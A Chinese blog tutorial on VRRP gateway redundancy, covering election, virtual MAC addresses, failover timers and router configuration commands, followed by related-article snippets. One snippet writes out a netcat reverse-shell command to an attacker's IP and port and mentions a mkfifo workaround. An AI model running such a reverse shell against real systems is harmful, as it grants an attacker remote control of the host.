VRRP虚拟路由器冗余协议

news2024/11/23 5:12:35

VRRP概述

VRRP是什么

  • VRRP:虚拟路由器冗余协议
  • 过把几台路由设备联合组成一台虚拟的路由设备,将虚拟路由设备的IP地址作为用户的默认网关实现与外部网络通信
  • 当网关设备发生故障时,VRRP能够选举新的网关设备承担数据流量,从而保障网络的可靠性,保障网络不中断

VRRP的作用:

  • 实现多个物理网关的冗余备份
  • 实现数据转发的负载分担

VRRP组成员角色:

  • 主路由器:Master→负责承担数据报文转发任务
  • 备份路由器:Backup→负责监控主路由器状态
  • 虚拟路由器:Virtual→又称VRRP备份组,虚拟路由器的ip地址作为局域网中主机的默认网关

VRRP角色选举:

  • 首先比较优先级,优先级大的为Master
  • 如果优先级一样,其次比较ip地址,ip地址大的为Master

VRRP需知:

  • 在一个VRRP备份组中,Master设备有且仅有一个
  • VRRP协议包括两个版本:VRRPv2和VRRPv3
  • VRRPv2仅适用于IPv4网络,VRRPv3适用于IPv4和IPv6两种网络
  • VRRP协议工作在网络层,报文封装在IP报头的后面,协议号是112
  • VRRP通告报文源地址为主路由器物理接口的IP地址(不是虚拟IP地址),目的地址是224.0.0.18

VRRP名词解释

  • VRRP路由器:凡是运行VRRP协议的路由器,都叫VRRP路由器
  • 虚拟路由器:又称VRRP备份组
  • Master路由器:承担数据转发任务的路由器
  • Backup路由器:备份路由器,监控主网关设备
  • VRID:虚拟路由器的标识,又称备份组组号
  • 虚拟IP地址:Virtual IP :虚拟路由器的IP地址,即:局域网内主机的默认网关地址
  • 虚拟MAC地址::虚拟MAC地址根据虚拟路由器VRID生成的

    一个虚拟路由器拥有一个虚拟MAC地址
    如果VRID是1: 虚拟MAC地址就是: 00-00-5E-00-01-01
    如果VRID是5: 虚拟MAC地址就是: 00-00-5E-00-01-05
    如果VRID是233: 虚拟MAC地址就是: 00-00-5E-00-01-E9

VRRP工作过程

  • VRRP备份组中的设备根据优先级选举出Master-主路由器
  • Master-主路由器发送免费ARP报文,将虚拟MAC地址通知给与它连接的设备,承担数据转发任务
  • Master-主路由器周期性发送VRRP通告报文(三层心跳报文)
  • 通告报文发送的周期时间:默认情况下是1秒
  • 通告报文发送的目的地址是组播地址:224.0.0.18
  • Backup-备份路由器监控主路由器状态,在3倍的"发送周期"+偏移时间后,如果无法收到主路由器发送的VRRP 通告报文,备份路由器升级为“新的Master-主路由器”,新的Master-路由器会立即发送免费ARP报文,刷新与它连接设备中的MAC表项,从而把用户流量引到新的Master设备上来
  • 原Master设备故障恢复时,首先切换至Backup状态:
    如果原Master已开启抢占模式,并且对比优先级,发现自己的优先级高,则主动将自己切换成Master
    如果原Master没有开启抢占模式,即便优先级高,也不会进行抢占,依然保持Backup状态

简单来说

  • vrrp备份组中选举出master设备
  • master设备,发送用户数据,并且每隔1秒发送一个vrrp通告报文
  • backup设备,监控master设备
  • 如果master设备故障,则进行主备切换
  • 如果master设备故障恢复,并且开启抢占模式,则进行主备回切

vrrp配置

拓扑

配置命令:

  • [R1]int g0/0/0
  • [R1-G0/0/0]vrrp vrid 1 virtual-ip 192.168.1.254 //在接口下开启vrrp功能,创建备份组1,定义虚拟网关为:192.168.1.254
  • [R1-G0/0/0]vrrp vrid 1 priority 130 //配置R1在备份组1中的优先级为130,让R1成为备份组1中master-主路由器
  • [R1-G0/0/0]vrrp vrid 1 track int g0/0/1 reduced 50 //追踪接口1的状态,如果down掉或者故障,则优先级减50,变成Backup状态
  • [R2]int g0/0/0
  • [R2-G0/0/0]vrrp vrid 1 virtual-ip 192.168.1.254 //在接口下开启vrrp功能,创建备份组1,定义虚拟网关地址为“ 192.168.1.254
  • R1和R2配置去往192.168.3.0/24网段的静态路由
    [R1]ip route-static 192.168.3.0 24 192.168.13.3
    [R2]ip route-static 192.168.3.0 24 192.168.23.3
  • R3配置去往192.168.1.0/24的浮动路由
    [R3]ip route-static 192.168.1.0 24 192.168.13.1
    [R3]ip route-static 192.168.1.0 24 192.168.23.1 preference 70
  • 验证VRRP
    PC1>tracert 192.168.2.1
    PC2>tracert 192.168.2.1

VRRP主备切换:

第一种情况:

  • master设备的vrrp的配置被人为的删除
  • master设备会发送一个优先级为0的vrrp报文
  • backup设备收到优先级为0的vrrp报文后,在等待一个偏移时间后,会升级为新的master
  • 切换的等待时间: 偏移时间: 256-优先级/256=0.5秒左右

第二种情况:

  • master设备故障了,无法发送vrrp报文
  • backup设备等待 master_down 定时器超时后,(3倍的发送周期+偏移时间)
  • backup设备升级为新的master设备
  • 切换的等待时间,是3.5秒左右 (master-down定时器+偏移时间)

两个定时器:

  • VRRP通告报文-发送间隔定时器: 1秒
  • master-down 定时器( 主路由器故障定时器):3倍的发送间隔定时器:3秒 + 偏移时间: 256-优先级/256,256-130=126/256:0.49秒
    VRRP抢占模式:模式开启

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1672543.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

2024年最新青龙面板跑脚本教程(一)持续更新中

文章目录 步骤 1: 安装青龙面板步骤 2: 访问青龙面板步骤 3: 上传或创建JavaScript脚本步骤 4: 添加定时任务步骤 5: 查看日志示例脚本步骤 6: 管理依赖和环境变量通用依赖如下,可手动增加。 要在青龙面板上运行JavaScript脚本,首先需要确保你已经成功安…

QCC---Aptx Lossless验证

因为aptx Lossless属于高通骁龙声音的一部分,一般支持高通骁龙声音的设备会支持到,比如说手机,而且还要支持最新的aptx adaptive协议R2.2版本。但是如果手上没有这样的手机的话,有source芯片也可以去做测试验证。在最新的784.1版本…

netcat工具无法使用 -e 参数

当在linux中使用netcat进行反向连接时, nc -e /bin/sh 攻击者的IP 端口 有时会报这种错误: 这说明此netcat不支持 -e 参数。 此时可以做如下更改: 使用mkfifo或mknod命令创建一个命名管道,然后使用cat命令读取管道中的内容&…

重发布与路由决策

单点重发布 将A协议--->B协议 [r2-rip-1]import-route ospf 1 将静态---->B协议 [r2-rip-1]import-route static 将直连---->B协议 [r2-rip-1]import-route direct 双点重发布 路由回馈:指的是从某协议传出的路由信息又被传回该协议中。可以引起选路…

景源畅信:小白如何做抖音电商怎么样?

在数字浪潮中崛起的抖音电商,以其独特的平台优势吸引了众多创业者的目光。特别是对于初入电商领域的“小白”来说,如何在这个全新的领域站稳脚跟,成为他们迫切需要解答的问题。接下来,我们将深入探讨小白如何在抖音电商中开辟属于…

java+B/S架构医院绩效考核管理系统maven+Visual Studio Code+avue医院绩效管理系统4大特点

javaB/S架构医院绩效考核管理系统源码mavenVisual Studio Codeavue医院绩效管理系统4大特点 医院绩效考核管理系统,采用多维度综合绩效考核的形式,针对院内实际情况分别对工作量、KPI指标、科研、教学、管理等进行全面考核。医院可结合实际需求&#xff…

uniapp 安卓证书导出成cer文件 查看公钥

// your_alias 换成 证书详情中的别名,your_keystore.keystore 改成自己的证书文件名 keytool -export -alias your_alias -file certificate.cer -keystore your_keystore.keystore双击生成的cer文件 可以查看到证书的详细信息 其中就包括证书的公钥

Python Socket

一、服务端 from socket import *def print_hi(name):print(fHi, {name})# 允许所有ip连接IP 0.0.0.0# 端口PORT 8003# 定义一次从socket缓冲区读入512个字节数据BUFFER_LEN 1024# 实例化socket对象 listenSocket 用来监听的socketlistenSocket socket(AF_INET, SOCK_STRE…

Vulnhub-wp 获取vulnhub靶机wp搜索工具

项目地址:https://github.com/MartinxMax/vulnhub-wp 简介 搜索Vulnhub平台的解题文章,之过滤返回出正确可访问的页面 使用 $ python3 vulnhubwp.py 支持模糊搜索 [] Query: kiop 进入选项4,获取wp地址 [] Choice options: 4

【408精华知识】速看!各种排序的大总结!

文章目录 一、插入排序(一)直接插入排序(二)折半插入排序(三)希尔排序 二、交换排序(一)冒泡排序(二)快速排序 三、选择排序(一)简单选…

基于springboot+mybatis+vue的项目实战之页面参数传递

如图所示&#xff0c;删除操作可以用按钮实现&#xff0c;也可以用超链接来实现。 1、第一种情况&#xff0c;用按钮实现。 html页面相关&#xff1a; <button type"button" click"deleteId(peot.id)">删除</button> <script>new Vue(…

centos7中如何全局搜索一下nginx的配置文件?

在CentOS 7中搜索Nginx的配置文件&#xff0c;你可以使用一些常用的命令行工具&#xff0c;比如find、grep等。这些工具可以帮助你在文件系统中查找文件&#xff0c;也可以用来查找Docker容器内部的文件&#xff0c;只要你知道如何访问容器的文件系统。 1. 搜索系统中的Nginx配…

Vue Excel 文件流导出乱码快速解决方案

今日在开发一个导出功能&#xff0c;原本一个非常简单的功能&#xff0c;却没想里面藏了陷阱&#xff01; 背景 前端导出的文件流乱码&#xff0c;此时确定非后端问题&#xff08;可以在postman导出是否正常来判断&#xff09;。 前端导出&#xff1a; 后端正常数据&#xf…

产品推荐 | 基于AMD Virtex 7 FPGA VC709 的高速连接功能开发板

01 产品概述 Virtex™ 7 FPGA VC709 连接功能套件是一款速率为 40Gb/s 的高速平台&#xff0c;您可以通过评估和开发连接功能&#xff0c;迅速为包含所有必要软硬件和 IP 核的高带宽和高性能应用提供强大的支持。它包括一个含有 PCI Express Gen 3、Northwest Logic 公司推出的…

FFmpeg常用API与示例(三)—— 音视频解码与编码

编解码层 1.解码 (1) 注册所有容器格式和 CODEC:av_register_all() (2) 打开文件:av_open_input_file() (3) 从文件中提取流信息:av_find_stream_info() (4) 穷举所有的流&#xff0c;查找其中种类为 CODEC_TYPE_VIDEO (5) 查找对应的解码器:avcodec_find_decoder() (6) …

【Arduino】数字I/O的使用

目录 1、引脚工作模式 2、写入引脚digitaWrite&#xff08;&#xff09; 3、读取引脚digitalRead(pin); 4、示例 跑马灯 1、引脚工作模式 Arduino通过pinMode()设置引脚的io工作模式&#xff0c;一共有4种模式 工作模式 Mode 说明 输出模式 OUTPUT 引脚为低阻抗状态&…

MQTT学习(二)

订阅主题和订阅确认 SUBSCRIBE——订阅主题 之前的CONNECT报文&#xff0c;分为 固定报头&#xff1a;必须存在&#xff0c;用于描述报文信息。里面有指出什么类型的报文&#xff0c;报文的等级。可变报头&#xff1a;不一定存在。主要看什么样子类型的报文。有效载荷部分&a…

OSU micro-benchmarks安装测试指导

OSU micro-benchmarks安装测试指导 OSU micro-benchmarks工具介绍 OSU Micro benchmark工具是由Ohio State University提供的MPI&#xff08;Message Passing Interface&#xff0c;消息传递接口&#xff09;通信效率评测工具。该工具旨在通过执行不同模式的MPI操作&#xff…

力扣75. 颜色分类

Problem: 75. 颜色分类 文章目录 题目描述思路及解法复杂度Code 题目描述 思路及解法 由于题目只提供0&#xff0c;1&#xff0c;2分别代表颜色红、白、蓝&#xff0c;并按此排序&#xff0c;那么我们可以遍历两次数组&#xff0c;第一次将0&#xff0c;全部放到数组前面一部分…

Rumor Remove Order Strategy on Social Networks

ABSTRACT 谣言被定义为广泛传播且没有可靠来源支持的言论。现代社会&#xff0c;谣言在社交网络上广泛传播。谣言的传播给社会带来了巨大的挑战。 “假新闻”故事可能会激怒您的情绪并改变您的情绪。有些谣言甚至会造成社会恐慌和经济损失。因此&#xff0c;谣言的影响可能是深…